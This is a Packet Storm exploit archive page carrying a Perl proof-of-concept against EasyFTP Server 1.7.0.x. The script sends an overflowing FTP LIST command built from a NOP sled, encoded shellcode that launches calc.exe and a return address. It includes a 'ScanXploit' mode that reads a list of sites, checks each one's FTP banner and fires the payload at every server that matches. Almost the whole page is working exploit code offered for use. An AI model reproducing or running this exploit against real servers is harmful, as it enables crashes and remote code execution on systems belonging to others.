exploit the possibilities

EasyFTP 1.7.0.x Denial Of Service

EasyFTP 1.7.0.x Denial Of Service
Posted Oct 17, 2010
Authored by Inj3cti0n P4ck3t

EasyFTP version 1.7.0.x denial of service crash exploit.

tags | exploit, denial of service
MD5 | 72b69300240e5861bff86a2ea0114d05

EasyFTP 1.7.0.x Denial Of Service

Change Mirror Download

sub banner {

print q {
##########################################################################################################
# #
# [*] PoC EasyFTP 1.7.0.X Crash #
# #
# [*] Author: Inj3cti0n P4ck3t #
# #
# [*] e-mail: fer_henrick@hotmail.com #
# #
# [*] Date: 18/10/2010 #
# #
# [*] Greetz: C00l3r - fvox - _MLK_ - DD3str0y3r - s4r4d0 - Sh0rtKiller #
# HADES - CODERED - FORAST - Colt7r - Z4i0n - M0nt3r #
# Th1nk3r - Hackinho - r0t3d - elemento_pcx - Observing #
# Believe - dr4k3 - Bl4ck9_f0x6 #
# #
# [*] Version Vulnerable: #
# #
# - EasyFTP Server 1.7.0.11 EN #
# #
# - EasyFTP Server 1.7.0.2 EN #
# #
# #
# #
# [*] System Operacional Tested: #
# #
# - Windows XP PACK 3 Brazilian #
# #
# #
# #
# #
# - EasyFTP Server 1.7.0.2 => http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip #
# #
# - EasyFTP Server 1.7.0.11 => http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip #
# #
# #
###############################Code Exploit ##############################################################

}
}

#!usr/bin/perl

use strict;
use IO::Socket;
use IO::Socket::INET;

if (!$ARGV[0]) {

&banner();

print q {

Options:

[1] - Test Exploit
[2] - Test ScanXploit

}
}

print " [+] Options: "; our $option = <stdin>;
chomp ($option);

if ($option == 1) {

my $portTest ="21";
my $hostTest="127.0.0.1";
my $usuarioTest ="anonymous";
my $senhaTest = "adminadmin";

# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]
my $shellCodeTest = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28");

my $nopsTest = ("\x90" x 40);
my $retornoTest = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ]
my $PayloadTest = $nopsTest . $shellCodeTest . $retornoTest;

my $AutenticarTest = ("\x55\x53\x45\x52\x20" . $usuarioTest . "\r\n" . "\x50\x41\x53\x53\x20 " . $senhaTest . "\r\n" . "LIST " . $PayloadTest . "\r\n" );

my $socketTest = new IO::Socket::INET (PeerAddr => $hostTest,PeerPort => $portTest,Proto => 'tcp',); die " [x] Error: $!\n" unless $socketTest;

print $socketTest $AutenticarTest;

close($socketTest);


sleep(2);

our $soquetes = IO::Socket::INET->new("$hostTest:$portTest");

if($soquetes) {


print " [-] Server no exploited \n";
}
else {

print " [+] Server Exploited\n";


}

}


################################## ScanXploit #############################################################################################

if ($option == 2) {

print " [+] Digite o nome da lista de sites, exampl,: lista.txt: ";
our $lista = <stdin>;
chomp ($lista);

open( SITE, "< $lista" ) or die( " [-] Could not open file: $!" );

our @array = <SITE>;

our $numero = $#array;

for (our $i = 0; $i <= $numero; $i++) {

our $Url = "$array[$i]";

if($Url !~ /http:\/\//) { $Url = "http://$Url"; }

our $Stop = index($Url,":");
our $Protocolo = substr($Url,0,$Stop);
our $Start = index($Url,"//") + 2;
our $Dominio = substr($Url,$Start);
our $Stop = index($Dominio,"/");
our $Dominio = substr($Dominio,0,$Stop);
our $Start = rindex($Url,"/") + 1;
our $NomeArq = substr($Url,$Start);
our $Compr_Url = length($Url);

our $ponto = "$Dominio \n";


our @portas = "21";

foreach our $porta (@portas) {



our $sock = IO::Socket::INET->new("$ponto:$porta");

if($sock) {

our $remote = IO::Socket::INET -> new (Proto => "tcp", PeerAddr => $ponto, PeerPort => $porta, Timeout => "7");

our $line = <$remote>;


if ($line =~ "BigFoolCat") {

my $usuario ="anonymous";
my $senha = "adminadmin";


# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]
my $shellCode = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28");

my $nops = ("\x90" x 40);
my $retorno = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ]
my $Payload = $nops . $shellCode . $retorno;

my $Autenticar = ("\x55\x53\x45\x52\x20" . $usuario . "\r\n" . "\x50\x41\x53\x53\x20 " . $senha . "\r\n" . "LIST " . $Payload . "\r\n" );

our $socket = new IO::Socket::INET (PeerAddr => $ponto,PeerPort => $porta,Proto => 'tcp',); die "[x] Error: $!\n" unless $socket;

print $socket $Autenticar;

close($socket);


}
sleep(2);

our $soquete = IO::Socket::INET->new("$ponto:$porta");

if($soquete) {


print " [-] Server no exploited \n";
}
else {

print " [+] Server Exploited\n";


}

}
}
}

print " [+] Servers tested: $numero \n";





}

if ($option != 1 && $option != 2 ) {

print " [+] Option invalid \n\n";

}

exit;

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close